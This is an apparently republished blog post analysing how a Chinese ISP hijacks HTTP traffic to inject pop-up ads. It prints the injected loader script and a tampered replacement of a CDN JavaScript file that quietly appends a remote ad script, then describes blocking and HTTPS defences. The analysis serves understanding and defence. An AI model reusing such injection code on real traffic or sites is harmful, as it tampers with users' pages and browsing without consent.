China Telecom hijacks HTTP traffic to insert ads

Others 2022-05-25 16:36:58 views: 0

Phenomenon

The broadband installed at home is from Zhejiang Telecom. When I use a browser to visit a web page, a floating advertisement often pops up in the lower right corner of the web page. Common advertisements look like this, right?

The ad has several features:

  • Whether it is a Chinese or foreign website, it is possible to pop up advertisements.
  • Some well-known websites do not seem to have played ads, such as Sina Weibo and Stack Overflow.
  • For a certain website, the advertisement only pops up on the first visit every day, and after it is displayed once, it will not appear after refreshing the webpage. Ads may also pop up when you visit the next day.
  • All HTTPS sites are ad-free.

Principle analysis

who added the ad

After seeing the advertisement several times at first, I thought it was a code such as an ad network added by the visiting website itself. Of course, my first reaction was to block it with the browser's anti-advertising plug-in. View the DOM through Chrome and find that the embed code of the ad is as follows,

<script src="http://116.252.178.232:9991/ad.0.js?v=3.9411&sp=9999&ty=dpc&sda_man=XFpdU1RJWFdZXlE=" type="text/javascript" id="bdstat"></script>

It usually appears </body>before , that is, at the end of the HTML body. The server address 116.252.178.232 belongs to Guangxi Telecom.

When the same Chinese advertisement popped up on several foreign websites, I was sure that this was not the advertisement code added by the website itself. Google this IP address, it is generally reflected that this is an advertisement inserted by ISP hijacking HTTP traffic.

The more accurate name for this kind of behavior is " direct online advertising ", which is described by Baidu Baike.

Online direct advertising is based on China Telecom's broadband access network. Through the analysis of users' online behavior, the system actively, directionally, strategically, and personalized pushes advertising information to users when users surf the Internet or in the process of surfing the Internet. . And according to the type of website the user is currently browsing, it can match the corresponding industry keywords, and push multimedia interactive advertising content such as animation, sound, video, and games to users according to the industry keywords. Keyword classification: computer, communication, automobile, finance, medicine, real estate, tourism, education, talent, beauty, film, game, digital, etc.

Therefore, this code is a direct online advertisement inserted by the ISP. Since users have to go through ISPs to access all networks, ISPs have the opportunity to add advertisements to any website and use the entire network as a tool for their own profit. The search found that not only China Telecom, China Unicom also has similar behaviors. In a certain year, 315 was also exposed. After that, ISPs in various places have converged, but now my home Zhejiang Telecom still plays every day.

how to add ads

Use a browser to access the ad embed code just now, the http://116.252.178.237:9991/ad.0.jscontent is formatted as follows,

var bcdata_sp = "";
var sda_man = "";
var bcdata_src = "0";
(function () {
	var a = function (h, f) {
		try {
			var d = document.createElement("span");
			d.innerHTML = h;
			api.writeO(d, f)
		} catch (g) {
			document.write(h)
		}
	};
	var c = function (d, f) {
		if (f) {
			f.appendChild(d);
			f.parentNode.appendChild(d)
		} else {
			var g = f || document.all || document.getElementsByTagName("*");
			var f = g[g.length - 1]
		}
		f.parentNode.appendChild(d)
	};
	var b = document.createElement("script");
	b.type = "text/javascript";
	b.src = "http://116.252.178.237:9991/main.js?ver=v48";
	c(b)
})();

This bootstrap code adds another script node to the DOM with the content http://116.252.178.237:9991/main.js. main.jsis the real creator of pop-up ads.

ad.0.jsSo when was it inserted? On different websites, ad.0.jsthe position of the node is not fixed, and it may not always be </body>before . Continue to use Chrome's Network tool to view the returned data of each request, and find that the HTML of the web page is normal and does not contain ad.0.jsnodes . It is speculated that a certain JS has been tampered with, and an advertisement guide code node is inserted into the DOM during execution.

Check the .jsfile , looking for files containing "116.252.178.232". Taking a website as an example, it is found that the content of the flowplayer.min.jsfile is abnormal. This file is a video player on a webpage, hosted on Qiniu CDN. The URL of the file is http://***.qiniudn.com/static/player/flowplayer.min.js, and the returned content displayed in Chrome is like this,

(function () {
	o = "http://***.qiniudn.com/static/player/flowplayer.min.js?";
	sh = "http://116.252.178.232:9991/ad.0.js?v=3.9411&sp=9999&ty=dpc&sda_man=XFpdU1RJWFdZXlE=";
	w = window;
	d = document;
	function ins(s, dm, id) {
		e = d.createElement("script");
		e.src = s;
		e.type = "text/javascript";
		id ? e.id = id : null;
		dm.appendChild(e);
	};
	p = d.scripts[d.scripts.length - 1].parentNode;
	ins(o, p);
	ds = function () {
		db = d.body;
		if (db && !document.getElementById("bdstat")) {
			if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) {
				if (w.top == w.self) {
					ins(sh, db, "bdstat");
				}
			}
		} else {
			setTimeout("ds()", 1500);
		}
	};
	ds();
})();

It can be seen that the returned data of the file is completely replaced. This code first inserts another <script>node , which reloads the real flowplayer.min.jsfile. Then create the ad bootstrap code node. In Chrome, see that the flowplayer.min.jsfile is requested twice and the second time returns the correct content.

The newly inserted <script>position is the parent node of the last script of the document. Since the execution order of the JS file is changed, it may theoretically affect the normal function of the tampered web page.

I have no further investigation into exactly how this ad system chooses to tamper with which JS request.

Other types of hijacking

What I am analyzing here is just the ad insertion method adopted by Zhejiang Telecom at the current stage. Some of the old methods used by ISPs can be seen online, including DNS hijacking, iframe hijacking.

DNS hijacking is, for example, when a user visits Google, they are redirected to a page full of advertisements. Also, when visiting an unresolved URL, jump to 189so.cn, the website navigation station of Telecom, which is of course very profitable.

iframe hijacking also hijacks HTTP traffic, loads the entire package of the visited web page in an iframe, and inserts pop-up advertisements on the fake page outside. The effect the user sees is similar to the screenshot at the beginning of this article.

shielding method

user

As an ordinary user, the general advice is to call the ISP to complain, scold the customer service, and ask the ISP to cancel the "special service" for your account. I haven't tried it and I don't want to try it, I'll have to keep the ad to see what nasty tactics the ISP does.

As an ordinary user, you can also find a programmer you know to help with this.

As a programmer, it is not difficult to block such advertisements. First, use the browser developer tool to find the URL of the advertisement guide code. If it is an IP address, use a router or firewall software to block the access of the IP; if it is a domain name, modify the hosts to resolve the domain name to 127.0.0.1. Can.

Note that blocking IP/domain names like this is not really blocking and still has side effects. For example, the webpage will be in a chrysanthemum state because the advertisement JS cannot be loaded, and the tampered webpage may not function properly. The predecessors have given some complicated methods to block advertisements, and basically they have to set up their own proxy servers. I think it's too complicated to be worth it. Here are a few reference methods:

site owner

As a website owner, is there a way to completely remove the ads that ISPs have inserted into your website? This way, regardless of whether your users have the ability to block ads, they won't see annoying ads when they visit the site.

The first feasible way is HTTPS, and HTTPS requests cannot be simply forged. At present, due to the poor network security situation, many websites have made the entire site HTTPS. Although there is some overhead, this is the most efficient way.

At present, the ISP's practice is to only hijack JS files. The easy way is to put all the JS on the CDN of Qiniu, and use the HTTPS service provided by Qiniu , and only change the JS address on the webpage to HTTPS, and the ISP cannot forge it. . (After testing on a website, this method currently works.)

Another possible method is to add JS code to the page, detect the node inserted by the ISP and delete it. The difficulty with this approach is that ISP ad insertion is regional and will be upgraded in the future. As a website owner, you can only deal with known situations, which may not always work.

 

http://www.tuicool.com/articles/Nje6fa7

Guess you like

Origin http://10.200.1.11:23101/article/api/json?id=326922437&siteId=291194637
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com